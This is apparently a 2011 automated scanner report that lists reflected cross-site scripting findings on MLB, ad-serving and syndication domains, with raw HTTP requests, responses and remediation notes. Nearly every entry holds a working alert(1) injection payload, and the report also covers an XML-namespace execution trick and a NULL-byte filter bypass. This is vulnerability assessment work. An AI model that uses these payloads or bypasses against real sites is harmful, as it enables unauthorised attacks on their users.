GET /index.jsp?12fe8"><script>alert(1)</script>fe0afe25a1a=1 HTTP/1.1 Host: mlb.mlb.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Server: Oracle-iPlanet-Web-Server/7.0 Content-Type: text/html;charset=utf-8 Content-Length: 114095 Cache-Control: max-age=600 Expires: Sun, 02 Oct 2011 23:00:45 GMT Date: Sun, 02 Oct 2011 22:50:45 GMT Connection: close Vary: Accept-Encoding
The value of the game_type request parameter is copied into the HTML document as plain text between tags. The payload 653da<script>alert(1)</script>bdf1290c6d2 was submitted in the game_type parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
HTTP/1.1 500 Internal Server Error Server: Oracle-iPlanet-Web-Server/7.0 Content-Type: text;charset=ISO-8859-1 Content-Length: 145 Cneonction: close X-N: S Date: Sun, 02 Oct 2011 22:51:40 GMT Connection: close
com.bamnetworks.lookup.servlet.LookupException: game_type must be a valid integer value and you passed: 653da<script>alert(1)</script>bdf1290c6d2
The value of the results request parameter is copied into the HTML document as plain text between tags. The payload 50aa1<script>alert(1)</script>9d81154f3fc was submitted in the results parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
HTTP/1.1 500 Internal Server Error Server: Oracle-iPlanet-Web-Server/7.0 Content-Type: text;charset=ISO-8859-1 Content-Length: 145 Cneonction: close X-N: S Date: Sun, 02 Oct 2011 22:51:31 GMT Connection: close
com.bamnetworks.lookup.servlet.LookupException: results must be a valid integer value and you passed: 550aa1<script>alert(1)</script>9d81154f3fc
The value of the season request parameter is copied into the HTML document as plain text between tags. The payload 49e07<script>alert(1)</script>7a3efe3920b was submitted in the season parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
HTTP/1.1 500 Internal Server Error Server: Oracle-iPlanet-Web-Server/7.0 Content-Type: text;charset=ISO-8859-1 Content-Length: 147 Cneonction: close X-N: S Date: Sun, 02 Oct 2011 22:51:36 GMT Connection: close
com.bamnetworks.lookup.servlet.LookupException: season must be a valid integer value and you passed: 201149e07<script>alert(1)</script>7a3efe3920b
The value of the game_type request parameter is copied into the HTML document as plain text between tags. The payload a0bc8<script>alert(1)</script>fb219e84209 was submitted in the game_type parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
HTTP/1.1 500 Internal Server Error Server: Oracle-iPlanet-Web-Server/7.0 Content-Type: text;charset=ISO-8859-1 Content-Length: 145 Cneonction: close X-N: S Date: Sun, 02 Oct 2011 22:51:39 GMT Connection: close
com.bamnetworks.lookup.servlet.LookupException: game_type must be a valid integer value and you passed: a0bc8<script>alert(1)</script>fb219e84209
The value of the results request parameter is copied into the HTML document as plain text between tags. The payload 45ef3<script>alert(1)</script>ebf1e9ad065 was submitted in the results parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
HTTP/1.1 500 Internal Server Error Server: Oracle-iPlanet-Web-Server/7.0 Content-Type: text;charset=ISO-8859-1 Content-Length: 145 Cneonction: close X-N: S Date: Sun, 02 Oct 2011 22:51:30 GMT Connection: close
com.bamnetworks.lookup.servlet.LookupException: results must be a valid integer value and you passed: 545ef3<script>alert(1)</script>ebf1e9ad065
The value of the season request parameter is copied into the HTML document as plain text between tags. The payload 3edc5<script>alert(1)</script>7a5d2535dc9 was submitted in the season parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
HTTP/1.1 500 Internal Server Error Server: Oracle-iPlanet-Web-Server/7.0 Content-Type: text;charset=ISO-8859-1 Content-Length: 147 Cneonction: close X-N: S Date: Sun, 02 Oct 2011 22:51:35 GMT Connection: close
com.bamnetworks.lookup.servlet.LookupException: season must be a valid integer value and you passed: 20113edc5<script>alert(1)</script>7a5d2535dc9
The value of the game_type request parameter is copied into the HTML document as plain text between tags. The payload 84a61<script>alert(1)</script>3a229642abe was submitted in the game_type parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of the season request parameter is copied into the HTML document as plain text between tags. The payload 391a1<script>alert(1)</script>747ddddc175 was submitted in the season parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of the sport_code request parameter is copied into the HTML document as plain text between tags. The payload 6dc0c<script>alert(1)</script>6bf97234ae2 was submitted in the sport_code parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of the season request parameter is copied into the HTML document as plain text between tags. The payload eb4c9<script>alert(1)</script>3bb2fc80d72 was submitted in the season parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of the game_type request parameter is copied into the HTML document as plain text between tags. The payload 4076b<script>alert(1)</script>4bb89352961 was submitted in the game_type parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of the season request parameter is copied into the HTML document as plain text between tags. The payload ba88d<script>alert(1)</script>3406a323a60 was submitted in the season parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of the sport_code request parameter is copied into the HTML document as plain text between tags. The payload af64f<script>alert(1)</script>9367318d0b9 was submitted in the sport_code parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of the all_star_sw request parameter is copied into the HTML document as plain text between tags. The payload fc18d<script>alert(1)</script>17400399bd2 was submitted in the all_star_sw parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of the season request parameter is copied into the HTML document as plain text between tags. The payload b0011<script>alert(1)</script>18b5dcaa26a was submitted in the season parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of the sport_code request parameter is copied into the HTML document as plain text between tags. The payload 7a269<script>alert(1)</script>b15d36caf40 was submitted in the sport_code parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of the org_id request parameter is copied into the XML document as plain text between tags. The payload f669b<a%20xmlns%3aa%3d'http%3a//www.w3.org/1999/xhtml'><a%3abody%20onload%3d'alert(1)'/></a>23a3982b8fe was submitted in the org_id parameter. This input was echoed as f669b<a xmlns:a='http://www.w3.org/1999/xhtml'><a:body onload='alert(1)'/></a>23a3982b8fe in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The response into which the attack is echoed contains XML data, which is not by default processed by the browser as HTML. However, by injecting XML elements which create a new namespace it is possible to trick some browsers (including Firefox) into processing part of the response as HTML. Note that this proof-of-concept attack is designed to execute when processed by the browser as a standalone response, not when the XML is consumed by a script within another page.
HTTP/1.1 200 OK Server: Oracle-iPlanet-Web-Server/7.0 Last-Modified: Sun, 02 Oct 2011 22:51:27 GMT Content-Type: text/xml;charset=ISO-8859-1 Content-Length: 1411 Cache-Control: max-age=120 Date: Sun, 02 Oct 2011 22:51:27 GMT Connection: close Vary: Accept-Encoding
<!-- Copyright 2011 MLB Advanced Media, L.P. Use of any content on this page acknowledges agreement to the terms posted here http://gdx.mlb.com/components/copyright.txt --><properties_info_events_season>org_id must be a valid double value and you passed: 1f669b<a xmlns:a='http://www.w3.org/1999/xhtml'><a:body onload='alert(1)'/></a>23a3982b8fe<schedule_event_info> ...[SNIP]...
The value of the season request parameter is copied into the XML document as plain text between tags. The payload 83cc2<a%20xmlns%3aa%3d'http%3a//www.w3.org/1999/xhtml'><a%3abody%20onload%3d'alert(1)'/></a>90e66fe3091 was submitted in the season parameter. This input was echoed as 83cc2<a xmlns:a='http://www.w3.org/1999/xhtml'><a:body onload='alert(1)'/></a>90e66fe3091 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The response into which the attack is echoed contains XML data, which is not by default processed by the browser as HTML. However, by injecting XML elements which create a new namespace it is possible to trick some browsers (including Firefox) into processing part of the response as HTML. Note that this proof-of-concept attack is designed to execute when processed by the browser as a standalone response, not when the XML is consumed by a script within another page.
HTTP/1.1 200 OK Server: Oracle-iPlanet-Web-Server/7.0 Last-Modified: Sun, 02 Oct 2011 22:51:20 GMT Content-Type: text/xml;charset=ISO-8859-1 Content-Length: 528 Cache-Control: max-age=120 Date: Sun, 02 Oct 2011 22:51:20 GMT Connection: close Vary: Accept-Encoding
<!-- Copyright 2011 MLB Advanced Media, L.P. Use of any content on this page acknowledges agreement to the terms posted here http://gdx.mlb.com/components/copyright.txt --><properties_info_events_season>season must be a valid double value and you passed: 201183cc2<a xmlns:a='http://www.w3.org/1999/xhtml'><a:body onload='alert(1)'/></a>90e66fe3091season must be a valid double value and you passed: 201183cc2<a xmlns:a='http://www.w3.org/1999/xhtml'> ...[SNIP]...
The value of the sport_code request parameter is copied into the XML document as plain text between tags. The payload af614<a%20xmlns%3aa%3d'http%3a//www.w3.org/1999/xhtml'><a%3abody%20onload%3d'alert(1)'/></a>e4f8b4d403d was submitted in the sport_code parameter. This input was echoed as af614<a xmlns:a='http://www.w3.org/1999/xhtml'><a:body onload='alert(1)'/></a>e4f8b4d403d in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The response into which the attack is echoed contains XML data, which is not by default processed by the browser as HTML. However, by injecting XML elements which create a new namespace it is possible to trick some browsers (including Firefox) into processing part of the response as HTML. Note that this proof-of-concept attack is designed to execute when processed by the browser as a standalone response, not when the XML is consumed by a script within another page.
HTTP/1.1 200 OK Server: Oracle-iPlanet-Web-Server/7.0 Last-Modified: Sun, 02 Oct 2011 22:51:21 GMT Content-Type: text/xml;charset=ISO-8859-1 Content-Length: 1144 Cache-Control: max-age=120 Date: Sun, 02 Oct 2011 22:51:21 GMT Connection: close Vary: Accept-Encoding
<!-- Copyright 2011 MLB Advanced Media, L.P. Use of any content on this page acknowledges agreement to the terms posted here http://gdx.mlb.com/components/copyright.txt --><properties_info_events_s ...[SNIP]... </org_history>sport_code must be a valid double value and you passed: af614<a xmlns:a='http://www.w3.org/1999/xhtml'><a:body onload='alert(1)'/></a>e4f8b4d403d</properties_info_events_season>
The value of the league_id request parameter is copied into the HTML document as plain text between tags. The payload 83c43<script>alert(1)</script>275b810be46 was submitted in the league_id parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
HTTP/1.1 500 Internal Server Error Server: Oracle-iPlanet-Web-Server/7.0 Content-Type: text;charset=ISO-8859-1 Content-Length: 149 Cneonction: close X-N: S Date: Sun, 02 Oct 2011 22:51:36 GMT Connection: close
com.bamnetworks.lookup.servlet.LookupException: league_id must be a valid integer value and you passed: 10383c43<script>alert(1)</script>275b810be46
The value of the season request parameter is copied into the HTML document as plain text between tags. The payload 4a2c4<script>alert(1)</script>c7d498188e5 was submitted in the season parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
HTTP/1.1 500 Internal Server Error Server: Oracle-iPlanet-Web-Server/7.0 Content-Type: text;charset=ISO-8859-1 Content-Length: 147 Cneonction: close X-N: S Date: Sun, 02 Oct 2011 22:51:31 GMT Connection: close
com.bamnetworks.lookup.servlet.LookupException: season must be a valid integer value and you passed: 20114a2c4<script>alert(1)</script>c7d498188e5
The value of the sit_code request parameter is copied into the HTML document as plain text between tags. The payload 8d396<script>alert(1)</script>2e73732a62a was submitted in the sit_code parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
HTTP/1.1 500 Internal Server Error Server: Oracle-iPlanet-Web-Server/7.0 Content-Type: text;charset=ISO-8859-1 Content-Length: 144 Cneonction: close X-N: S Date: Sun, 02 Oct 2011 22:51:27 GMT Connection: close
com.bamnetworks.lookup.servlet.LookupException: sit_code must be a valid integer value and you passed: 8d396<script>alert(1)</script>2e73732a62a
The value of the league_id request parameter is copied into the HTML document as plain text between tags. The payload d1724<script>alert(1)</script>804d7574235 was submitted in the league_id parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
HTTP/1.1 500 Internal Server Error Server: Oracle-iPlanet-Web-Server/7.0 Content-Type: text;charset=ISO-8859-1 Content-Length: 149 Cneonction: close X-N: S Date: Sun, 02 Oct 2011 22:51:55 GMT Connection: close
com.bamnetworks.lookup.servlet.LookupException: league_id must be a valid integer value and you passed: 103d1724<script>alert(1)</script>804d7574235
The value of the results request parameter is copied into the HTML document as plain text between tags. The payload d1b6e<script>alert(1)</script>ee980f71c89 was submitted in the results parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
HTTP/1.1 500 Internal Server Error Server: Oracle-iPlanet-Web-Server/7.0 Content-Type: text;charset=ISO-8859-1 Content-Length: 145 Cneonction: close X-N: S Date: Sun, 02 Oct 2011 22:51:51 GMT Connection: close
com.bamnetworks.lookup.servlet.LookupException: results must be a valid integer value and you passed: 5d1b6e<script>alert(1)</script>ee980f71c89
The value of the season request parameter is copied into the HTML document as plain text between tags. The payload 2f5ba<script>alert(1)</script>8d0bc9b171a was submitted in the season parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
HTTP/1.1 500 Internal Server Error Server: Oracle-iPlanet-Web-Server/7.0 Content-Type: text;charset=ISO-8859-1 Content-Length: 147 Cneonction: close X-N: S Date: Sun, 02 Oct 2011 22:51:47 GMT Connection: close
com.bamnetworks.lookup.servlet.LookupException: season must be a valid integer value and you passed: 20112f5ba<script>alert(1)</script>8d0bc9b171a
The value of the sit_code request parameter is copied into the HTML document as plain text between tags. The payload caf2e<script>alert(1)</script>d94f6c200b9 was submitted in the sit_code parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
HTTP/1.1 500 Internal Server Error Server: Oracle-iPlanet-Web-Server/7.0 Content-Type: text;charset=ISO-8859-1 Content-Length: 144 Cneonction: close X-N: S Date: Sun, 02 Oct 2011 22:51:44 GMT Connection: close
com.bamnetworks.lookup.servlet.LookupException: sit_code must be a valid integer value and you passed: caf2e<script>alert(1)</script>d94f6c200b9
2.138. http://mlb.mlb.com/mlb/schedule/ [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://mlb.mlb.com
Path: /mlb/schedule/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d672a"><script>alert(1)</script>eb6717e2916 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of the tcid request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 85567"><script>alert(1)</script>098ce36d245 was submitted in the tcid parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of the game_type request parameter is copied into the HTML document as plain text between tags. The payload 13484<script>alert(1)</script>d95a9907ac6 was submitted in the game_type parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of the results request parameter is copied into the HTML document as plain text between tags. The payload 7b5ec<script>alert(1)</script>7b6642d4096 was submitted in the results parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of the season request parameter is copied into the HTML document as plain text between tags. The payload 6f609<script>alert(1)</script>4c66b5fb60c was submitted in the season parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of the c_id request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2e6a6"><script>alert(1)</script>f921261e239 was submitted in the c_id parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
2.144. http://mlb.mlb.com/stats/sortable.jsp [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://mlb.mlb.com
Path: /stats/sortable.jsp
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1e21a"><script>alert(1)</script>a485043a9bc was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of the tcid request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b2028"><script>alert(1)</script>bbd37b46f6d was submitted in the tcid parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of the section request parameter is copied into the HTML document as plain text between tags. The payload 4d16f<script>alert(1)</script>e0016a98a3b was submitted in the section parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /style/nav_2011.jsp?c_id=mlb&section=homepage4d16f<script>alert(1)</script>e0016a98a3b HTTP/1.1 Host: mlb.mlb.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1 Accept: text/css,*/*;q=0.1 Referer: http://mlb.mlb.com/index.jsp Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Server: Oracle-iPlanet-Web-Server/7.0 Content-Type: text/css;charset=ISO-8859-1 Content-Length: 17476 Cache-Control: max-age=7179 Expires: Mon, 03 Oct 2011 00:50:29 GMT Date: Sun, 02 Oct 2011 22:50:50 GMT Connection: close Vary: Accept-Encoding
The value of the cb request parameter is copied into the HTML document as plain text between tags. The payload 6f6ae<script>alert(1)</script>0d6e0b1f5a4 was submitted in the cb parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of the cb request parameter is copied into the HTML document as plain text between tags. The payload 8f81c<script>alert(1)</script>32c1ecfbe81 was submitted in the cb parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of the ctk request parameter is copied into the HTML document as plain text between tags. The payload d6179<script>alert(1)</script>3fec9533353 was submitted in the ctk parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cfc97"><script>alert(1)</script>e5327a0f899 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
HTTP/1.1 200 OK Date: Sun, 02 Oct 2011 23:03:46 GMT Server: Apache/2.2.3 (Red Hat) P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Content-Length: 337 Content-Type: text/html
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ce31f"><script>alert(1)</script>b8ff4cee58f was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
HTTP/1.1 200 OK Date: Sun, 02 Oct 2011 23:03:52 GMT Server: Apache/2.2.3 (Red Hat) P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Content-Length: 331 Content-Type: text/html
The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload 53390<script>alert(1)</script>48d372daf91 was submitted in the callback parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of the section request parameter is copied into the HTML document as plain text between tags. The payload 302c8<script>alert(1)</script>c976b726125 was submitted in the section parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload e1b66<script>alert(1)</script>e3a516ef303 was submitted in the callback parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
2.155. http://syndication.mmismm.com/mmtnt.php [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://syndication.mmismm.com
Path: /mmtnt.php
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 989e6'%3balert(1)//5c41763d8fe was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 989e6';alert(1)//5c41763d8fe in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the 1317595850600&ASTPCT request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8defb"><script>alert(1)</script>51735ab64d1 was submitted in the 1317595850600&ASTPCT parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of the 1317596177473&ASTPCT request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3f26d"><script>alert(1)</script>5b6aeb91de4 was submitted in the 1317596177473&ASTPCT parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of the 1317596233240&ASTPCT request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6cfbc"><script>alert(1)</script>64d9d73c90e was submitted in the 1317596233240&ASTPCT parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /p/kl/46/799/r/12/4/8/ast0k3n/cj_K_lW0d48P6qLz9wyckqiJXwdoi0k1/view.html?1317596233240&ASTPCT=http://demr.opt.fimserve.com/lnk/?ek=ADAOfa1xkkLw8PjLqkW1BuA_MZeWAr5p_Z1xLPhBBvfLu04la-ciMFsfbQjCoF1b_HYyQxIsd1h2Y3C4b2M3HVAheAPd-NWRdPIUX4z5dDRUKmrKVb4_Dk_S0iGCe-5qYn5leWi7-jYPzHgFLLWizOVXeEgkpR_fYAgS6muvrL7Jd8yszpD3ujnVNgu6_X3cXc7XnkvKxBvilGN88wiUMrk9RIG0n7gBXloArauTHinYmejF4rSteGfdjiNnnbG6BZKD72zI_fJIunhwFK5z5hd8kIM3t1xvGbNgJnFIexqShref=6cfbc"><script>alert(1)</script>64d9d73c90e HTTP/1.1
Host: this.content.served.by.adshuffle.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://demr.opt.fimserve.com/adopt/?r=h&l=19000011&pos=mrec&rnd=337696563
Response
HTTP/1.1 200 OK
Cache-Control: private, no-cache="Set-Cookie"
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: Sun, 02 Oct 2011 23:04:33 GMT
Server: Microsoft-IIS/7.0
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Set-Cookie: av1=51f37.7e2e3=1002111804; domain=by.adshuffle.com; expires=Thu, 01-Jan-2099 06:00:00 GMT; path=/
Set-Cookie: vcs0=v51F37:7E2E3_0_0_0_26239C_0_0; domain=by.adshuffle.com; expires=Thu, 01-Jan-2099 06:00:00 GMT; path=/
Date: Sun, 02 Oct 2011 23:04:32 GMT
Content-Length: 4633
Set-Cookie: NSC_betivggmf-opef=ffffffff0908150a45525d5f4f58455e445a4a423660;expires=Sun, 02-Oct-2011 23:09:33 GMT;path=/
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="t ...[SNIP]... dDRUKmrKVb4_Dk_S0iGCe-5qYn5leWi7-jYPzHgFLLWizOVXeEgkpR_fYAgS6muvrL7Jd8yszpD3ujnVNgu6_X3cXc7XnkvKxBvilGN88wiUMrk9RIG0n7gBXloArauTHinYmejF4rSteGfdjiNnnbG6BZKD72zI_fJIunhwFK5z5hd8kIM3t1xvGbNgJnFIexqShref=6cfbc"><script>alert(1)</script>64d9d73c90ehttp://this.content.served.by.adshuffle.com/p/kl/46/799/r/12/4/8/1113356081/v/576462396953379735/ac/335671/b/279832/c/516835/clickTag/clickTag1/click.html" target="_blank"> ...[SNIP]...
2.159. http://this.content.served.by.adshuffle.com/p/kl/46/799/r/12/4/8/ast0k3n/cj_K_lW0d48P6qLz9wyckqiJXwdoi0k1/view.html [name of an arbitrarily supplied request parameter]
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fc979"><script>alert(1)</script>139d12629a4 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of the 1317596233240&ASTPCT request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e1e3f"><script>alert(1)</script>308ad7d428d was submitted in the 1317596233240&ASTPCT parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of the 1317596233240&ASTPCT request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload %002f193</script><a>1e90cad1154 was submitted in the 1317596233240&ASTPCT parameter. This input was echoed as 2f193</script><a>1e90cad1154 in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
2.162. http://this.content.served.by.adshuffle.com/p/kl/46/799/r/12/4/8/ast0k3n/iNIxevlHF5kAQBtAyfH5gdj8Q064zRlLFp1GKaNiBDB5pQHOTpEoNhjHys1-UgoC/view.html [name of an arbitrarily supplied request parameter]
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b8334"><script>alert(1)</script>a7e1e6eb735 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload fb176"-alert(1)-"1649d04200f was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4187b"-alert(1)-"0b4b129bfb0 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a4c8c"-alert(1)-"ce2f205a2cd was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
